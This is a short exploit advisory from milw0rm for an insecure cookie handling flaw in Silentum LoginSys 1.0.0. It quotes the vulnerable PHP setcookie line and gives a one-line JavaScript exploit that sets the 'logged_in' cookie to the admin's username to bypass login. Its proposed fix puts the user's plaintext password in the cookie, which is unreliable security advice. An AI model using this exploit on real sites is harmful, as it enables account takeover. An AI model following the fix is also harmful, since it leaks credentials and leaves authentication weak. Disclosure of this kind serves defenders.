[0x01] Informations:
Script : Silentum LoginSys 1.0.0
Download : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1
Vulnerability : Insecure Cookie Handling
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
Notes : Proud to be Italian
Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
[0x02] Bug: [Insecure Cookie Handling]
Bugged file is: /[path]/login2.php
else {
setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/");
header("Location: index.php");
If we log in correctly, a cookie is set with name "logged_in" and as content the username name.
[!] FIX: Set as content username's password.
[CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE]
[!] EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/";
*admin_username is the nick of the administrator
# milw0rm.com [2008-12-28]